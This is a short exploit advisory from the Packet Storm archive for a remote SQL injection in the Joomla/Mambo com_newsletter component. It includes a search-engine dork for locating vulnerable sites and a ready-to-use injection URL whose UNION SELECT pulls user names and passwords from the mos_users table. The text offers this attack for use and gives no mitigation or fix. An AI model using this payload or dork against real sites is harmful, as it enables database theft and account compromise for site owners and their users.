The Joomla Newsletter component suffers from a remote SQL injection vulnerability.
b538d695009e24c3b5735d7ce4ef1ecaeb33b5d17236f5b42164279668b9bb83#########################################################################
#
# joomla SQL Injection(com_newsletter)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_newsletter"
#
########################################################################
EXPLOIT :
index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
notes:
"Newsletter component for mambo 4.5" from Adam van Dongen, www.tim-online.nl //Thanks George
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed